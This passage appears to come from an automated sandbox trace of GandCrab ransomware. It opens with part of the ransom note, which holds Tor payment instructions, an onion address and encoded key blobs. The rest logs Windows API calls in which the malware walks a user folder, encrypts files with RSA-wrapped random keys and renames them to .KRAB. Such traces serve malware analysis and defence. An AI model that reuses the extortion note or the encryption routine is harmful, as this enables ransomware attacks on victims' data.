extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0055.389] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0055.390] CloseHandle (hObject=0x434) returned 1 [0055.390] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.390] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.390] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2, wMilliseconds=0x251)) [0055.391] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.391] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0055.391] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0055.391] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock") returned 61 [0055.391] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0055.394] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.394] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.394] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned 38 [0055.394] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\*" [0055.394] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd920 [0055.394] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.395] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0055.395] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0055.395] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.395] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0055.395] lstrcmpW (lpString1="1kyvuc.mp4", lpString2=".") returned 1 [0055.395] lstrcmpW (lpString1="1kyvuc.mp4", lpString2="..") returned 1 [0055.395] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="1kyvuc.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1kyvuc.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1kyvuc.mp4" [0055.395] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.395] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1kyvuc.mp4.KRAB") returned 53 [0055.395] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1kyvuc.mp4") returned 48 [0055.395] lstrlenW (lpString=".mp4") returned 4 [0055.395] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.395] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0055.395] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.396] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1kyvuc.mp4") returned 48 [0055.396] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1kyvuc.mp4") returned 48 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="desktop.ini") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="autorun.inf") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="ntuser.dat") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="iconcache.db") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="bootsect.bak") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="boot.ini") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="ntuser.dat.log") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="thumbs.db") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="KRAB-DECRYPT.html") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="KRAB-DECRYPT.txt") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="CRAB-DECRYPT.txt") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="ntldr") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="NTDETECT.COM") returned -1 [0055.396] lstrcmpiW (lpString1="1kyvuc.mp4", lpString2="Bootfont.bin") returned -1 [0055.396] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.396] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.397] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.397] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.397] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.397] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0055.397] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.397] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.398] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.398] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.398] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.399] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.399] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0055.399] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.399] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.399] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.399] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd660) returned 1 [0055.400] CryptGetKeyParam (in: hKey=0xfbd660, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.400] CryptEncrypt (in: hKey=0xfbd660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.400] GetLastError () returned 0x0 [0055.400] CryptDestroyKey (hKey=0xfbd660) returned 1 [0055.400] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.400] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.400] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd520) returned 1 [0055.401] CryptGetKeyParam (in: hKey=0xfbd520, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.401] CryptEncrypt (in: hKey=0xfbd520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.401] GetLastError () returned 0x0 [0055.401] CryptDestroyKey (hKey=0xfbd520) returned 1 [0055.401] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.401] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1kyvuc.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\1kyvuc.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0055.401] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0055.402] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0055.402] ReadFile (in: hFile=0x43c, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ef7c*=0x383e, lpOverlapped=0x0) returned 1 [0055.417] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffc7c2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.417] WriteFile (in: hFile=0x43c, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x383e, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338ef78*=0x383e, lpOverlapped=0x0) returned 1 [0055.417] WriteFile (in: hFile=0x43c, lpBuffer=0x3040000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3040000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0055.417] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.421] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.421] CloseHandle (hObject=0x43c) returned 1 [0055.422] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.423] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1kyvuc.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\1kyvuc.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1kyvuc.mp4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\1kyvuc.mp4.krab")) returned 1 [0055.423] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.424] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0055.424] lstrcmpW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2=".") returned 1 [0055.424] lstrcmpW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="..") returned 1 [0055.424] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="3JIaQ04Ky Uur8j.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\3JIaQ04Ky Uur8j.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\3JIaQ04Ky Uur8j.wav" [0055.424] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.424] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\3JIaQ04Ky Uur8j.wav.KRAB") returned 62 [0055.424] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\3JIaQ04Ky Uur8j.wav") returned 57 [0055.424] lstrlenW (lpString=".wav") returned 4 [0055.424] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.424] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".wav ") returned 5 [0055.424] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.425] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\3JIaQ04Ky Uur8j.wav") returned 57 [0055.425] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\3JIaQ04Ky Uur8j.wav") returned 57 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="desktop.ini") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="autorun.inf") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="ntuser.dat") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="iconcache.db") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="bootsect.bak") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="boot.ini") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="ntuser.dat.log") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="thumbs.db") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="ntldr") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="NTDETECT.COM") returned -1 [0055.425] lstrcmpiW (lpString1="3JIaQ04Ky Uur8j.wav", lpString2="Bootfont.bin") returned -1 [0055.425] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.425] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.426] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.426] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.426] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.426] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0055.426] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.427] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.427] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.427] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.428] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.428] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.428] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0055.428] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.428] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.428] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.429] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0055.429] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.429] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.429] GetLastError () returned 0x0 [0055.429] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0055.429] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.429] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.430] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd960) returned 1 [0055.430] CryptGetKeyParam (in: hKey=0xfbd960, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.430] CryptEncrypt (in: hKey=0xfbd960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.430] GetLastError () returned 0x0 [0055.430] CryptDestroyKey (hKey=0xfbd960) returned 1 [0055.430] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.430] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\3JIaQ04Ky Uur8j.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\3jiaq04ky uur8j.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0055.430] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0055.431] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0055.431] ReadFile (in: hFile=0x43c, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ef7c*=0x16f48, lpOverlapped=0x0) returned 1 [0055.445] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffe90b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.445] WriteFile (in: hFile=0x43c, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x16f48, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338ef78*=0x16f48, lpOverlapped=0x0) returned 1 [0055.446] WriteFile (in: hFile=0x43c, lpBuffer=0x3040000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3040000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0055.446] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.450] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.451] CloseHandle (hObject=0x43c) returned 1 [0055.457] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.457] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\3JIaQ04Ky Uur8j.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\3jiaq04ky uur8j.wav"), 